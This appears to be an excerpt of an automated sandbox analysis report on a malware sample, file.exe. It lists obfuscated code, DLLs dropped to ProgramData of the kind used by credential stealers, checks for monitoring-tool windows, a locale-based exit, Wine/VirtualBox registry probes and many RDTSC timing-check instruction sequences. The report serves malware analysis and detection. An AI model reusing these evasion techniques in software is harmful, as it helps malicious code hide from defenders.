Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edi; mov dword ptr [esp], ecx 6_2_011519FF
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push esi; mov dword ptr [esp], eax 6_2_01151AEC
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 4724FC23h; mov dword ptr [esp], esi 6_2_01151B06
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push eax; mov dword ptr [esp], edi 6_2_01151B22
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push ecx; mov dword ptr [esp], esp 6_2_01151B3E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 142BA786h; mov dword ptr [esp], eax 6_2_01151BA0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 26856CECh; mov dword ptr [esp], edi 6_2_01151CCB
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push ecx; mov dword ptr [esp], 02A2E9BEh 6_2_01151CEF
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push ebp; mov dword ptr [esp], ecx 6_2_01151D0C
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 60CF5AA0h; mov dword ptr [esp], ecx 6_2_01151D2B
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 54B33A7Fh; mov dword ptr [esp], edx 6_2_01151D7C
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push ebp; mov dword ptr [esp], 5EA4F699h 6_2_01151D9E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push ebx; mov dword ptr [esp], ebp 6_2_01151DAF
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 0C40D2FFh; mov dword ptr [esp], eax 6_2_01151DCC
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edi; mov dword ptr [esp], ebx 6_2_01151E21
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edx; mov dword ptr [esp], 29D53504h 6_2_01151E3C
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 128430A6h; mov dword ptr [esp], edx 6_2_01151EAE
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 16C006AAh; mov dword ptr [esp], edx 6_2_01151F06
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edi; mov dword ptr [esp], ecx 6_2_01151F2A
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 41D1B440h; mov dword ptr [esp], ecx 6_2_0115200E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 7AE25463h; mov dword ptr [esp], esi 6_2_0115201E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 3500BEFFh; mov dword ptr [esp], ecx 6_2_0115204A
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push ebx; mov dword ptr [esp], 72CF845Dh 6_2_011520C4
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push eax; mov dword ptr [esp], ebp 6_2_011520D7
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edi; mov dword ptr [esp], ebx 6_2_01152190
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push 7935C176h; mov dword ptr [esp], ecx 6_2_0115219E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edx; mov dword ptr [esp], ebp 6_2_01152200
Source: file.exe Static PE information: section name: mscidksm entropy: 7.954586600170134
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00DA9860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF20AC second address: FF20B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1162295 second address: 11622B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E4E9B9F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11612FB second address: 1161300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1161300 second address: 1161319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E4E9B9EFh 0x00000009 jno 00007FD0E4E9B9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116147E second address: 11614A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0E506DD06h 0x0000000a jmp 00007FD0E506DD14h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11614A0 second address: 11614B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11615EC second address: 11615F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11615F0 second address: 11615F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116188E second address: 1161899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165046 second address: 116507B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007FD0E4E9B9EBh 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116507B second address: 11650D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jl 00007FD0E506DD0Ch 0x00000010 je 00007FD0E506DD06h 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 pop eax 0x00000024 jmp 00007FD0E506DD0Eh 0x00000029 popad 0x0000002a pop eax 0x0000002b jmp 00007FD0E506DD12h 0x00000030 lea ebx, dword ptr [ebp+12446EC7h] 0x00000036 mov esi, dword ptr [ebp+122D3628h] 0x0000003c xchg eax, ebx 0x0000003d push ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11650D3 second address: 11650FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jc 00007FD0E4E9B9ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007FD0E4E9B9E6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11651AC second address: 11651B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116533E second address: 1165344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165344 second address: 116538E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FD0E506DD13h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FD0E506DD11h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jl 00007FD0E506DD14h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116538E second address: 1165392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11855FD second address: 1185605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185605 second address: 118560E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118560E second address: 1185618 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0E506DD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11836B6 second address: 11836C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11836C1 second address: 11836C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11836C5 second address: 11836D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD0E4E9B9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183B08 second address: 1183B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1183F45 second address: 1183F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD0E4E9B9F3h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FD0E4E9B9E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11840D7 second address: 118412B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD0E506DD11h 0x0000000b popad 0x0000000c jmp 00007FD0E506DD0Dh 0x00000011 jnc 00007FD0E506DD12h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FD0E506DD16h 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118412B second address: 1184154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD0E4E9B9F8h 0x0000000c jmp 00007FD0E4E9B9EAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184154 second address: 1184171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD19h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184171 second address: 118417A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184604 second address: 118460C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118460C second address: 1184630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E4E9B9F5h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FD0E4E9B9E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A598 second address: 117A59D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114F970 second address: 114F974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114F974 second address: 114F980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD0E506DD06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114F980 second address: 114F985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114F985 second address: 114F9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0E506DD12h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0E506DD13h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114F9B7 second address: 114F9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184764 second address: 1184769 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184769 second address: 118476F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118476F second address: 118478B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FD0E506DD10h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118478B second address: 1184795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184795 second address: 1184799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184799 second address: 11847AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FD0E4E9B9EEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184F14 second address: 1184F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184F18 second address: 1184F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185061 second address: 1185065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185065 second address: 1185069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185069 second address: 118506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118506F second address: 1185075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185075 second address: 1185094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E506DD19h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11851E9 second address: 11851EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118545C second address: 1185460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185460 second address: 1185470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD0E4E9B9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1185470 second address: 118549C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0E506DD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FD0E506DD1Ah 0x00000010 jmp 00007FD0E506DD14h 0x00000015 jo 00007FD0E506DD12h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118549C second address: 11854A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11854A2 second address: 11854AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11891D2 second address: 11891DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD0E4E9B9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11891DC second address: 11891E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118AA0F second address: 118AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118AA13 second address: 118AA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118AB6B second address: 118AB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD0E4E9B9EDh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0E4E9B9F2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157DAC second address: 1157DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157DB0 second address: 1157DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157DB6 second address: 1157DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0E506DD17h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157DD7 second address: 1157DE3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0E4E9B9E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1157DE3 second address: 1157DEF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0E506DD0Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119145D second address: 119146A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0E4E9B9E8h 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119146A second address: 1191470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191BAA second address: 1191BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1191BB1 second address: 1191BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11923DE second address: 11923E8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119243C second address: 1192441 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1192441 second address: 1192485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 245BD5F8h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FD0E4E9B9E8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov esi, 6BD51F8Ch 0x0000002d call 00007FD0E4E9B9E9h 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
